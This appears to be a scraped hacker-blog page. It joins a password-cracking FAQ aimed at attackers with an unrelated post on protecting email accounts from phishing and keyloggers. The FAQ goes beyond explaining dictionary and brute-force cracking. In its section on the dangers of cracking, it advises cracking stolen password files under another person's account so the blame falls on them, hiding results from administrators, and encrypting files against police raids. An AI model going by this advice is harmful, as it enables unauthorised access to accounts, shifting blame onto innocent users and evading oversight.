To crack a password requires getting a copy of the one-way hash stored on the server, and then using the algorithm generate your own hash until you get a match. When you get a match, whatever word you used to generate your hash will allow you to log into that system. Since this can be rather time-consuming, automation is typically used. There are freeware password crackers available for NT, Netware, and Unix.

 

1. Why protect the hashes?

 

If the one-way hashes are not the password itself but a mathematical derivative, why should they be protected? Well, since the algorithm is already known, a password cracker could be used to simply encrypt the possible passwords and compare the one-way hashes until you get a match. There are two types of approaches to this — dictionary and brute force.
Usually the hashes are stored in a part of the system that has extra security to limit access from potential crackers.

 

2. What is a dictionary password cracker?

 

A dictionary password cracker simply takes a list of dictionary words, and one at a time encrypts them to see if they encrypt to the one way hash from the system. If the hashes are equal, the password is considered cracked, and the word tried from the dictionary list is the password.

Some of these dictionary crackers can “manipulate” each word in the wordlist by using filters. These rules/filters allow you to change “idiot” to “1d10t” and other advanced variations to get the most from a word list. The best known of these mutation filters are the rules that come with Crack (for Unix). These filtering rules are so popular they have been ported over to cracking software for NT.

If your dictionary cracker does not have manipulation rules, you can “pre-treat” the wordlist. There are plenty of wordlist manipulation tools that allow all kinds of ways to filter, expand, and alter wordlists. With a little careful planning, you can turn a small collection of wordlists into a very large and thorough list for dictionary crackers without those fancy word manipulations built in.

 

3. What is a brute force password cracker?

 

A brute force cracker simply tries all possible passwords until it gets the password. From a cracker perspective, this is usually very time consuming. However, given enough time and CPU power, the password eventually gets cracked.

Most modern brute force crackers allow a number of options to be specified, such as maximum password length or characters to brute force with.

 

4. Which method is best for cracking?

 

It really depends on your goal, the cracking software you have, and the operating system you are trying to crack. Let’s go through several scenarios.

If you remotely retrieved the password file through some system bug, your goal may be to simply get logged into that system. With the password file, you now have the user accounts and the hashes. A dictionary attack seems like the quickest method, as you may simply want access to the box. This is typical if you have a method of leveraging basic access to gain god status.

If you already have basic access and used this access to get the password file, maybe you have a particular account you wish to crack. While a couple of swipes with a dictionary cracker might help, brute force may be the way to go.

If your cracking software does both dictionary and brute force, and both are quite slow, you may just wish to kick off a brute force attack and then go about your day. By all means, we recommend a dictionary attack with a pre-treated wordlist first, followed up by brute force only on the accounts you really want the password to.

You should pre-treat your wordlists if the machine you are going to be cracking from bottlenecks more at the CPU than at the disk controller. For example, some slower computers with extremely fast drives make good candidates for large pre-treated wordlists, but if you have the CPU cycles to spare you might want to let the cracking program’s manipulation filters do their thing.

A lot of serious hackers have a large wordlist in both regular and pre-treated form to accommodate either need.

 

5. What is a salt?

 

To increase the overhead in cracking passwords, some algorithms employ salts to add further complexity and difficulty to the cracking of passwords. These salts are typically 2 to 8 bytes in length, and algorithmically introduced to further obfuscate the one-way hash. Of the major operating systems covered here, only NT does not use a salt. The specifics for salts for both Unix and Netware systems are covered in their individual password sections.

Historically, the way cracking has been done is to take a potential password, encrypt it and produce the hash, and then compare the result to each account in the password file. By adding a salt, you force the cracker to have to read the salt in and encrypt the potential password with each salt present in the password file. This increases the amount of time to break all of the passwords, although it is certainly no guarantee that the passwords can’t be cracked. Because of this most modern password crackers when dealing with salts do give the option of checking a specific account.

 

6. What are the dangers of cracking passwords?

 

The dangers are quite simple, and quite real. If you are caught with a password file you do not have legitimate access to, you are technically in possession of stolen property in the eyes of the law. For this reason, some hackers like to run the cracking on someone else’s systems, thereby limiting their liability. I would only recommend doing this on a system you have a legitimate or well-established account on if you wish to keep a good eye on things, but perhaps have a way of running the cracking software under a different account than your own. This way, if the cracking is discovered (as it often is — cracking is fairly CPU-intensive), it looks to belong to someone else. Obviously, you would want to run this under system adminstrator priviledges as you may have a bit more control, such as assigning lower priority to the cracking software, and hiding the results (making it less obvious to the real administrator).

Being on a system you have legit access to also allows you better access to check on the progress. Of course, if it is known you are a hacker, you’ll still be the first to be blamed whether the cracking software is yours or not!

Running the cracking software in the privacy of your own home has the advantage of allowing you to throw any and all computing power you have at your disposal at a password, but if caught (say you get raided) then there is little doubt whose cracking job is running. However, there are a couple of things you can do to protect yourself: encrypt your files. Only decrypt them when you are viewing them, and wipe and/or encrypt them back after you are done viewing them.

 

7. Is there any way I can open a password-protected Microsoft Office document?

 

Certainly! There are plenty of commercial programs that will do this, but we give props to Elcomsoft. 30-day trial versions are available here.

How to Protect an Email Account from being Hacked Aditya Illusion rwxr-xr-x 0 23.54

Filename	How to Protect an Email Account from being Hacked
Permission	rw-r--r--
Author	Aditya Illusion
Date and Time	23.54
Label
Action

Today in this post I’ll teach you how to protect your email account from being hacked. Nowadays I get a lot of emails where most of the people say “My Email account is hacked please help…”. Now one question which arises in our mind is: “Is it so easy to hack an email account? OR Is it so difficult to protect an email account from being hacked?”. The single answer to these two questions is “Absolutely NOT!”. It is neither easy to hack an email nor difficult to protect an email account from bieng hacked.

 

If this is the case, then what is the reason for many people to lose their accounts?

The answer is very simple. They don’t know how to protect themselves from being hacked! In fact most of the people who lose their email accounts are not the victims of hacking but the victims of Trapping. They lose their passwords not because they are hacked by some expert hackers but they are fooled to such an extent that they themselves give away their password.

Are you confused? If so continue reading and you’ll come to know…

Now I’ll mention some of the most commonly used online scams which fool people and make them lose their passwords. I’ll also mention how to protect your email account from these scams.

 

1. WEBSITE SPOOFING

Website spoofing is the act of creating a website, with the intention of misleading the readers. The website will be created by a different person or organisation (Other than the original) especially for the purposes of cheating. Normally, the website will adopt the design of the target website and sometimes has a similar URL.

For example a Spoofed Website of Yahoo.com appears exactly same as Yahoo Website. So most of the people believe that it is the original site and lose their passwords. The main intention of spoofed websites is to fool users and take away their passwords. For this,the spoofed sites offer fake login pages. These fake login pages resemble the original login pages of sites like Yahoo,Gmail,Orkut etc. Since it resemble’s the original login page people beleive that it is true and give away their username and passwords by trying to login to their accounts.

 

Solution:

• Never try to login/access your email account from the sites other than the original site.
• Always type the URL of the site in the address bar to get into the site. Never click on the hyperlink to enter the site.

 

2. BY USING KEYLOGGERS

The other commonly used method to steal password is by using a Keylogger. A Keylogger is nothing but a spyware. The detailed description of keylogger and it’s usage is discussed in the post Hacking an email account. If you read this post you’ll come to know that it is too easy to steal the password using a keylogger program. If you just access your email account from a computer installed with keylogger, you definitely lose your password. This is because the keylogger records each and every keystroke that you type.

 

Solution:

Protecting yourselves from a keylogger scam is very easy.Just install a good anti-spyware program and update it regularly. This keeps your PC secure from a keylogger. Also there is a program called Anti-keylogger which is specially designed to detect and remove keyloggers. You can use this program to detect some stealth keyloggers which remain undetected by many anti-spyware programs.

 

3. ACCESSING YOUR EMAIL ACCOUNT FROM CYBER CAFES

Do you access your email from cyber cafes?  Then definitely you are under the risk of loosing your password.In fact many people lose their email account in cyber cafes. For the owner of the cyber cafe it’s just a cakewalk to steal your password. For this he just need’s to install a keylogger on his computers. So when you login to your email account from this PC, you give away your password to the cafe owner. Also there are many Remote Administration Tools (RATs) which can be used to monitor your browsing activities in real time.

This doesn’t mean that you should never use cyber cafes for browsing the internet. I know, not all the cyber cafe owners will be so wicked but it is recommended not to use cafes for accessing confidential information. If it comes to the matter of security never trust anyone, not even your friend. I always use my own PC to login to my accounts to ensure safety.